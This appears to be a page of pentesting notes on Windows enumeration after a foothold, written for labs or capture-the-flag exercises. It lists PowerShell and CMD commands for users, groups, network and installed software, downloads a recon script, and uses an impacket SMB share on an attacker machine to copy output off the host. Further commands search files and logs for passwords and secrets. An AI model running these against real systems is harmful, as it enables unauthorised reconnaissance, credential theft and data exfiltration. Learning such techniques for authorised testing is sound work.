Enumeration

You can also use the below Guide for enumeration.

http://michalszalkowski.com/security/windows/cmd-powershell/

Enumeration

PowerShell Commands

Powershell

# To see hostname and username
whoami

# To see the group of current user.
whoami /groups

# Existing Users List.
Get-LocalUser

# List of Groups (Existing Groups)
Get-LocalGroup

# Finding the member of the group
Get-LocalGroupMember <Name of the group>

# Operating System, Version architecture information.
systeminfo

# Network information
ipconfig /all

# Routing information
route print

# List of active network connections.
netstat -ano

# To Get List of installed software 32 bit
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# To Get List of installed software 64 bit
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# To get list of running Processes
Get-Process


# Now if we got the List of process and then we want to see the location of the binary file of the Process then we can use below command:
where /R C:\ *NonStandardProcess* # CMD Command
# Note Using powershell command I am unable to find NonStandartProcess. If are using Powershell and want to search for any process binary then use below command:
cmd.exe /c "where /R C:\ *NonStandardProcess* "

# Gives all ip in Address Resolution Protocol (ARP) table
arp -a

You can do common enumeration mentioned above using below ps1 file. This will save the outout in .txt file.

wget https://raw.githubusercontent.com/vishalraj1444/Pentesting_Guide/refs/heads/main/recon_Script/general_recon.ps1

You can transfer file to kali linux and paste the content to Notes.

# You can use impacket smbserver.
impacket-smbserver -smb2support -username user -password user123 drive .

# in shell
net use Z: \\192.168.45.244\drive /u:user user123
copy Z:\general_recon.ps1  general_recon.ps1
# Run the script
.\general_recon.ps1
copy system_info.txt Z: # Copy file to kali linux

# Run this in kali linux
# File will work it is in utf8 and not utf16.
# First convert it.
iconv -f UTF-16 -t UTF-8 system_info.txt -o system_info_utf8.txt
xclip -selection clipboard < system_info_utf8.txt

# To verify, you can press ctrl+shift+v.

Powershell Search Command

# Searching for file content.
# This will give all the files in Users directory.
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.exe, *.log -File -Recurse -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

# Important Info:
# -File: To search for files
# -Directory: To search for directory.
# -Force: To Search for hidden directory or file.
# -Include or -Filter: To Sort or filter out the output of data. (use filter for if there is multiple filter.
# Where-Object: selects objects that have particular property values from the collection of objects that are passed to it.
# Select-String: uses regular expression matching to search for text patterns in input strings and files.
# Get-Content: works as "cat" command:
# Example:
# Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object {$_.Id -eq 4104} | Export-Csv -Path "script_block_logs.csv"
# Get-Content "script_block_logs.csv" | Select-String -Pattern "password|username|api_key|secret|GetBytes|ToBase64String|Credential"

For more info:

# Searching for flag after solving lab.
# Searching for local.txt
# It searches and if found then displays the file content with ip address.
(Get-Content (Get-ChildItem -Filter "local.txt" -Path C:\ -Recurse -ErrorAction SilentlyContinue).FullName); ipconfig

# Same as above but displays path also:

$flag = Get-ChildItem -Path C:\ -Include "local.txt","proof.txt","flag.txt" -Recurse -ErrorAction SilentlyContinue; "Location: $($flag.FullName)"; "`nFlag: $(Get-Content $flag.FullName)"; ipconfig


# Searches and displays both proof and local flag

CMD Commands

CMD

# To see hostname and Username
whoami

# To see the group of current user.
whoami /groups

# Existing users list.
net user

# List of Groups (Existing Groups)
net localgroup

# Finding the Member of Group
net localgroup <Name of the Group>

# Operating System, Version architecture information.
systeminfo

# Network information
ipconfig /all

# Routing information
route print

# List of active network connections.
netstat -ano

# To display installed software list.
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName | findstr /i "DisplayName"

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName | findstr /i "DisplayName"

# Searching file
# First navigate to desited directory.
cd <directoryToSearchIn>
dir <nameOfTheFile> /s

PreviousWindows Privilege escalation Nextrecon script [Add to github]

Last updated 11 months ago